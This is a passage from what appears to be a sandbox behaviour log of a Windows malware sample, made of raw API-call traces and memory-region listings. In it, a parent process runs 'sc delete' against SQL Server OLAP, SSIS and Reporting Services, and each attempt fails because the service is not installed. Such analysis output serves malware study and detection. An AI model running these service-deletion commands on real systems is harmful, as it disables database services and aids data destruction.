returned 0x62 [0078.502] GetFileType (hFile=0x24) returned 0x2 [0078.502] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xfc421cf780 | out: lpMode=0xfc421cf780) returned 1 [0078.552] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xfc422d9860*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xfc421cf778, lpReserved=0x0 | out: lpBuffer=0xfc422d9860*, lpNumberOfCharsWritten=0xfc421cf778*=0x62) returned 1 [0078.553] LocalFree (hMem=0xfc422d9860) returned 0x0 [0078.553] LocalFree (hMem=0x0) returned 0x0 [0078.553] CloseServiceHandle (hSCObject=0xfc422d8c20) returned 1 [0078.553] LocalFree (hMem=0x0) returned 0x0 [0078.553] exit (_Code=1060) Thread: id = 338 os_tid = 0x1300 Process: id = "41" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xee89000" os_pid = "0xd1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQLServerOLAPService\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1036 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1037 start_va = 0x8402e70000 end_va = 0x8402e8ffff entry_point = 0x0 region_type = private name = "private_0x0000008402e70000" filename = "" Region: id = 1038 start_va = 0x8402e90000 end_va = 0x8402ea3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008402e90000" filename = "" Region: id = 1039 start_va = 0x8402eb0000 end_va = 0x8402f2ffff entry_point = 0x0 region_type = private name = "private_0x0000008402eb0000" filename = "" Region: id = 1040 start_va = 0x8402f30000 end_va = 0x8402f33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008402f30000" filename = "" Region: id = 1041 start_va = 0x8402f40000 end_va = 0x8402f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008402f40000" filename = "" Region: id = 1042 start_va = 0x8402f50000 end_va = 0x8402f51fff entry_point = 0x0 region_type = private name = "private_0x0000008402f50000" filename = "" Region: id = 1043 start_va = 0x7df5ff680000 end_va = 0x7ff5ff67ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff680000" filename = "" Region: id = 1044 start_va = 0x7ff67a580000 end_va = 0x7ff67a5a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a580000" filename = "" Region: id = 1045 start_va = 0x7ff67a5a8000 end_va = 0x7ff67a5a8fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a5a8000" filename = "" Region: id = 1046 start_va = 0x7ff67a5ae000 end_va = 0x7ff67a5affff entry_point = 0x0 region_type = private name = "private_0x00007ff67a5ae000" filename = "" Region: id = 1047 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1048 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1648 start_va = 0x84030c0000 end_va = 0x84031bffff entry_point = 0x0 region_type = private name = "private_0x00000084030c0000" filename = "" Region: id = 1649 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1650 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5334 start_va = 0x8402e70000 end_va = 0x8402e7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008402e70000" filename = "" Region: id = 5335 start_va = 0x8402e80000 end_va = 0x8402e86fff entry_point = 0x0 region_type = private name = "private_0x0000008402e80000" filename = "" Region: id = 5336 start_va = 0x8402f60000 end_va = 0x840301dfff entry_point = 0x8402f60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5337 start_va = 0x8403020000 end_va = 0x840309ffff entry_point = 0x0 region_type = private name = "private_0x0000008403020000" filename = "" Region: id = 5338 start_va = 0x84031f0000 end_va = 0x84031fffff entry_point = 0x0 region_type = private name = "private_0x00000084031f0000" filename = "" Region: id = 5339 start_va = 0x7ff67a480000 end_va = 0x7ff67a57ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a480000" filename = "" Region: id = 5340 start_va = 0x7ff67a5ac000 end_va = 0x7ff67a5adfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a5ac000" filename = "" Region: id = 5341 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5342 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5351 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5352 start_va = 0x84030a0000 end_va = 0x84030a6fff entry_point = 0x0 region_type = private name = "private_0x00000084030a0000" filename = "" Region: id = 5353 start_va = 0x8403200000 end_va = 0x84032defff entry_point = 0x8403200000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5354 start_va = 0x84031c0000 end_va = 0x84031d1fff entry_point = 0x84031c0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 69 os_tid = 0xd20 [0078.421] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.421] __set_app_type (_Type=0x1) [0078.421] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.421] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.421] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.543] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.543] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.543] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.543] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.543] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.544] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.544] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.544] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.544] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.544] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.544] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.544] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.544] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.544] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.544] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.544] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.544] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.544] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.544] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.544] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.544] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.544] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.544] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.544] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.545] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x84030c8a10 [0078.550] OpenServiceW (hSCManager=0x84030c8a10, lpServiceName="MSSQLServerOLAPService", dwDesiredAccess=0x10000) returned 0x0 [0078.550] GetLastError () returned 0x424 [0078.550] _ultow (in: _Dest=0x424, _Radix=49477304 | out: _Dest=0x424) returned="1060" [0078.550] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.552] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x8402f2f670, nSize=0x2, Arguments=0x8402f2f6a0 | out: lpBuffer="顠̌\x84") returned 0x62 [0078.552] GetFileType (hFile=0x24) returned 0x2 [0078.552] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x8402f2f620 | out: lpMode=0x8402f2f620) returned 1 [0078.565] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x84030c9860*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x8402f2f618, lpReserved=0x0 | out: lpBuffer=0x84030c9860*, lpNumberOfCharsWritten=0x8402f2f618*=0x62) returned 1 [0078.566] LocalFree (hMem=0x84030c9860) returned 0x0 [0078.566] LocalFree (hMem=0x0) returned 0x0 [0078.566] CloseServiceHandle (hSCObject=0x84030c8a10) returned 1 [0078.566] LocalFree (hMem=0x0) returned 0x0 [0078.566] exit (_Code=1060) Thread: id = 340 os_tid = 0x1308 Process: id = "42" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xed8e000" os_pid = "0xd24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MsDtsServer100\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1049 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1050 start_va = 0x53fc8f0000 end_va = 0x53fc90ffff entry_point = 0x0 region_type = private name = "private_0x00000053fc8f0000" filename = "" Region: id = 1051 start_va = 0x53fc910000 end_va = 0x53fc923fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053fc910000" filename = "" Region: id = 1052 start_va = 0x53fc930000 end_va = 0x53fc9affff entry_point = 0x0 region_type = private name = "private_0x00000053fc930000" filename = "" Region: id = 1053 start_va = 0x53fc9b0000 end_va = 0x53fc9b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053fc9b0000" filename = "" Region: id = 1054 start_va = 0x53fc9c0000 end_va = 0x53fc9c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053fc9c0000" filename = "" Region: id = 1055 start_va = 0x53fc9d0000 end_va = 0x53fc9d1fff entry_point = 0x0 region_type = private name = "private_0x00000053fc9d0000" filename = "" Region: id = 1056 start_va = 0x7df5ff5c0000 end_va = 0x7ff5ff5bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5c0000" filename = "" Region: id = 1057 start_va = 0x7ff679ec0000 end_va = 0x7ff679ee2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679ec0000" filename = "" Region: id = 1058 start_va = 0x7ff679eec000 end_va = 0x7ff679eedfff entry_point = 0x0 region_type = private name = "private_0x00007ff679eec000" filename = "" Region: id = 1059 start_va = 0x7ff679eee000 end_va = 0x7ff679eeefff entry_point = 0x0 region_type = private name = "private_0x00007ff679eee000" filename = "" Region: id = 1060 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1061 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1651 start_va = 0x53fca90000 end_va = 0x53fcb8ffff entry_point = 0x0 region_type = private name = "private_0x00000053fca90000" filename = "" Region: id = 1652 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1653 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5355 start_va = 0x53fc8f0000 end_va = 0x53fc8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053fc8f0000" filename = "" Region: id = 5356 start_va = 0x53fc900000 end_va = 0x53fc90ffff entry_point = 0x0 region_type = private name = "private_0x00000053fc900000" filename = "" Region: id = 5357 start_va = 0x53fc9e0000 end_va = 0x53fca5ffff entry_point = 0x0 region_type = private name = "private_0x00000053fc9e0000" filename = "" Region: id = 5358 start_va = 0x53fca60000 end_va = 0x53fca66fff entry_point = 0x0 region_type = private name = "private_0x00000053fca60000" filename = "" Region: id = 5359 start_va = 0x53fcb90000 end_va = 0x53fcc4dfff entry_point = 0x53fcb90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5360 start_va = 0x7ff679dc0000 end_va = 0x7ff679ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679dc0000" filename = "" Region: id = 5361 start_va = 0x7ff679eea000 end_va = 0x7ff679eebfff entry_point = 0x0 region_type = private name = "private_0x00007ff679eea000" filename = "" Region: id = 5362 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5363 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5373 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5374 start_va = 0x53fca70000 end_va = 0x53fca76fff entry_point = 0x0 region_type = private name = "private_0x00000053fca70000" filename = "" Region: id = 5375 start_va = 0x53fcc50000 end_va = 0x53fcd2efff entry_point = 0x53fcc50000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5376 start_va = 0x53fcd30000 end_va = 0x53fcd41fff entry_point = 0x53fcd30000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 70 os_tid = 0xd28 [0078.573] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.573] __set_app_type (_Type=0x1) [0078.573] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.573] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.573] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.693] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.693] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.693] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.693] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.693] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.693] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.693] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.693] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.693] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.693] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.693] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.693] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.693] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.693] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.693] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.693] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.693] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.693] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.693] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.693] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.693] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.693] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.694] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.695] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x53fca98c40 [0078.699] OpenServiceW (hSCManager=0x53fca98c40, lpServiceName="MsDtsServer100", dwDesiredAccess=0x10000) returned 0x0 [0078.699] GetLastError () returned 0x424 [0078.700] _ultow (in: _Dest=0x424, _Radix=-56952216 | out: _Dest=0x424) returned="1060" [0078.700] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.701] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x53fc9afa20, nSize=0x2, Arguments=0x53fc9afa50 | out: lpBuffer="顐ﲩS") returned 0x62 [0078.701] GetFileType (hFile=0x24) returned 0x2 [0078.701] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x53fc9af9d0 | out: lpMode=0x53fc9af9d0) returned 1 [0078.753] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x53fca99850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x53fc9af9c8, lpReserved=0x0 | out: lpBuffer=0x53fca99850*, lpNumberOfCharsWritten=0x53fc9af9c8*=0x62) returned 1 [0078.754] LocalFree (hMem=0x53fca99850) returned 0x0 [0078.754] LocalFree (hMem=0x0) returned 0x0 [0078.754] CloseServiceHandle (hSCObject=0x53fca98c40) returned 1 [0078.754] LocalFree (hMem=0x0) returned 0x0 [0078.754] exit (_Code=1060) Thread: id = 341 os_tid = 0x130c Process: id = "43" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x5e653000" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"ReportServer\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1062 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1063 start_va = 0x2ab8220000 end_va = 0x2ab823ffff entry_point = 0x0 region_type = private name = "private_0x0000002ab8220000" filename = "" Region: id = 1064 start_va = 0x2ab8240000 end_va = 0x2ab8253fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ab8240000" filename = "" Region: id = 1065 start_va = 0x2ab8260000 end_va = 0x2ab82dffff entry_point = 0x0 region_type = private name = "private_0x0000002ab8260000" filename = "" Region: id = 1066 start_va = 0x2ab82e0000 end_va = 0x2ab82e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ab82e0000" filename = "" Region: id = 1067 start_va = 0x2ab82f0000 end_va = 0x2ab82f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ab82f0000" filename = "" Region: id = 1068 start_va = 0x2ab8300000 end_va = 0x2ab8301fff entry_point = 0x0 region_type = private name = "private_0x0000002ab8300000" filename = "" Region: id = 1069 start_va = 0x7df5ffdd0000 end_va = 0x7ff5ffdcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdd0000" filename = "" Region: id = 1070 start_va = 0x7ff67aa10000 end_va = 0x7ff67aa32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa10000" filename = "" Region: id = 1071 start_va = 0x7ff67aa3d000 end_va = 0x7ff67aa3dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa3d000" filename = "" Region: id = 1072 start_va = 0x7ff67aa3e000 end_va = 0x7ff67aa3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa3e000" filename = "" Region: id = 1073 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1074 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1654 start_va = 0x2ab8460000 end_va = 0x2ab855ffff entry_point = 0x0 region_type = private name = "private_0x0000002ab8460000" filename = "" Region: id = 1655 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1656 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5364 start_va = 0x2ab8220000 end_va = 0x2ab822ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ab8220000" filename = "" Region: id = 5365 start_va = 0x2ab8230000 end_va = 0x2ab8236fff entry_point = 0x0 region_type = private name = "private_0x0000002ab8230000" filename = "" Region: id = 5366 start_va = 0x2ab8310000 end_va = 0x2ab83cdfff entry_point = 0x2ab8310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5367 start_va = 0x2ab83d0000 end_va = 0x2ab844ffff entry_point = 0x0 region_type = private name = "private_0x0000002ab83d0000" filename = "" Region: id = 5368 start_va = 0x2ab8600000 end_va = 0x2ab860ffff entry_point = 0x0 region_type = private name = "private_0x0000002ab8600000" filename = "" Region: id = 5369 start_va = 0x7ff67a910000 end_va = 0x7ff67aa0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a910000" filename = "" Region: id = 5370 start_va = 0x7ff67aa3b000 end_va = 0x7ff67aa3cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa3b000" filename = "" Region: id = 5371 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5372 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5377 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5378 start_va = 0x2ab8450000 end_va = 0x2ab8456fff entry_point = 0x0 region_type = private name = "private_0x0000002ab8450000" filename = "" Region: id = 5379 start_va = 0x2ab8610000 end_va = 0x2ab86eefff entry_point = 0x2ab8610000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5380 start_va = 0x2ab8560000 end_va = 0x2ab8571fff entry_point = 0x2ab8560000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: 